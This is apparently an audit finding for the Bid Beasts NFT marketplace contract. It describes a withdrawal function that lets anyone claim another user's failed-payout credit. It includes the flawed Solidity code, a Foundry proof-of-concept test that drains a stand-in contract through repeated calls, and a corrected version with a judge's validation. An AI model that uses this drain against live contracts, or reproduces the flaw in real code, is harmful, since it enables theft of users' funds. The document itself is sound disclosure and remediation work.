Bid Beasts

First Flight #49
Beginner Friendly, Foundry, Solidity, NFT
100 EXP
Submission Details
Severity: high
Valid

Anyone can withdraw the failed payouts of any receiver

Root + Impact

Function BidBeastsNFTMarket::withdrawAllFailedCredits lets any caller withdraw the failed payouts credited to any receiver, and it never clears the receiver's credit, so the theft can be repeated.

Description

Function BidBeastsNFTMarket::withdrawAllFailedCredits takes _receiver as a parameter, reads the failed payouts credited to that receiver, and sends the full amount to msg.sender. Nothing checks that msg.sender is _receiver, so anyone can withdraw any receiver's failed payouts. Worse, the line meant to clear the credit writes to failedTransferCredits[msg.sender] rather than failedTransferCredits[_receiver], so the victim's balance stays intact and the same call can be repeated until the contract has no ETH left.

function withdrawAllFailedCredits(address _receiver) external {
    // Amount is read from the caller-supplied _receiver ...
    uint256 amount = failedTransferCredits[_receiver];
    require(amount > 0, "No credits to withdraw");
    // ... but the slot that is cleared belongs to msg.sender, so _receiver's credit survives
    failedTransferCredits[msg.sender] = 0;
    // ... and the ETH is paid to msg.sender, not to _receiver
    (bool success, ) = payable(msg.sender).call{value: amount}("");
    require(success, "Withdraw failed");
}
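The following Foundry test is an added proof of concept, not code from the Bid Beasts repository. It reproduces only the vulnerable function in a minimal stand-in contract (VulnerableMarket) next to a copy with the recommended fix applied (FixedMarket); seedFailedCredit is a hypothetical helper that stands in for whatever path in the real contract credits a failed payout, and the contract names, addresses and amounts are all constructed for the example. The first test shows that the attacker is not limited to the victim's credited amount: because the victim's credit is never cleared, the call can be repeated until the contract is empty.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Minimal stand-in for BidBeastsNFTMarket. Only the failed-credit logic
// from the finding is reproduced; seedFailedCredit() is a hypothetical
// helper that plays the role of a payout that failed and was credited.
contract VulnerableMarket {
    mapping(address => uint256) public failedTransferCredits;

    function seedFailedCredit(address receiver) external payable {
        failedTransferCredits[receiver] += msg.value;
    }

    // Vulnerable: amount is read from _receiver, but the slot that is
    // cleared and the address that is paid are both msg.sender.
    function withdrawAllFailedCredits(address _receiver) external {
        uint256 amount = failedTransferCredits[_receiver];
        require(amount > 0, "No credits to withdraw");
        failedTransferCredits[msg.sender] = 0;
        (bool success, ) = payable(msg.sender).call{value: amount}("");
        require(success, "Withdraw failed");
    }
}

// Same logic with the recommended fix applied: the caller can only
// withdraw its own credit, which is zeroed before the external call.
contract FixedMarket {
    mapping(address => uint256) public failedTransferCredits;

    function seedFailedCredit(address receiver) external payable {
        failedTransferCredits[receiver] += msg.value;
    }

    function withdrawAllFailedCredits() external {
        uint256 amount = failedTransferCredits[msg.sender];
        require(amount > 0, "No credits to withdraw");
        failedTransferCredits[msg.sender] = 0;
        (bool success, ) = payable(msg.sender).call{value: amount}("");
        require(success, "Withdraw failed");
    }
}

contract FailedCreditsPoC is Test {
    address victim = makeAddr("victim");
    address attacker = makeAddr("attacker");

    function test_attackerDrainsContractViaVictimCredit() public {
        VulnerableMarket market = new VulnerableMarket();
        // 1 ether of failed payout is owed to the victim ...
        market.seedFailedCredit{value: 1 ether}(victim);
        // ... and the contract holds 2 more ether (e.g. other users' funds).
        vm.deal(address(market), 3 ether);

        // Each call pays msg.sender the victim's credit without clearing it,
        // so the attacker simply repeats until the contract is empty.
        for (uint256 i = 0; i < 3; i++) {
            vm.prank(attacker);
            market.withdrawAllFailedCredits(victim);
        }
        assertEq(attacker.balance, 3 ether);
        assertEq(address(market).balance, 0);
        // The victim's credit is still recorded but can never be paid now.
        assertEq(market.failedTransferCredits(victim), 1 ether);

        // With no ETH left the low-level call fails and the require reverts.
        vm.prank(attacker);
        vm.expectRevert(bytes("Withdraw failed"));
        market.withdrawAllFailedCredits(victim);
    }

    function test_fixedVersionOnlyPaysOwner() public {
        FixedMarket market = new FixedMarket();
        market.seedFailedCredit{value: 1 ether}(victim);

        // The attacker has no credit of its own, so the call reverts.
        vm.prank(attacker);
        vm.expectRevert(bytes("No credits to withdraw"));
        market.withdrawAllFailedCredits();

        // The victim withdraws exactly once; a second attempt reverts.
        vm.prank(victim);
        market.withdrawAllFailedCredits();
        assertEq(victim.balance, 1 ether);
        assertEq(market.failedTransferCredits(victim), 0);

        vm.prank(victim);
        vm.expectRevert(bytes("No credits to withdraw"));
        market.withdrawAllFailedCredits();
    }
}
```

Run with forge test -vvv from a Foundry project that has forge-std installed. The first test passes against the vulnerable function and fails as soon as the amount is read from, and cleared for, the same address that is paid.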

Risk

Likelihood: Medium

A credit must exist in failedTransferCredits before the call pays anything out, so the attack window opens only after a payout to some receiver has failed and been credited. Once it has, the call is unprivileged and can be made by anyone at any time.

Impact: High

Anyone can take any receiver's failed payout. Because the receiver's credit is never cleared, repeated calls can drain the contract's entire ETH balance, not just the credited amount.

Recommended Mitigation

Change withdrawAllFailedCredits so that it reads, clears and pays out only the credit belonging to msg.sender:

-function withdrawAllFailedCredits(address _receiver) external {
+function withdrawAllFailedCredits() external {
- uint256 amount = failedTransferCredits[_receiver];
+ uint256 amount = failedTransferCredits[msg.sender];
require(amount > 0, "No credits to withdraw");
failedTransferCredits[msg.sender] = 0;
(bool success, ) = payable(msg.sender).call{value: amount}("");
require(success, "Withdraw failed");
}
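Review bot: the fix is sound as written: amount, the zeroed slot and the payee are all msg.sender, and the slot is zeroed before the external call, so a reentrant call from the payee reads amount == 0 and reverts at the require. Note that dropping the _receiver parameter also removes the ability to trigger a withdrawal on someone else's behalf; if that is wanted, the alternative is to keep the parameter but read and clear failedTransferCredits[_receiver] and send to _receiver. Since the signature changes, any caller or test that passed an address must be updated.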
Updates

Lead Judging Commences

cryptoghost Lead Judge about 1 month ago
Submission Judgement Published
Validated
Assigned finding tags:

BidBeast Marketplace: Unrestricted FailedCredits Withdrawal

withdrawAllFailedCredits allows any user to withdraw another account’s failed transfer credits due to improper use of msg.sender instead of _receiver for balance reset and transfer.
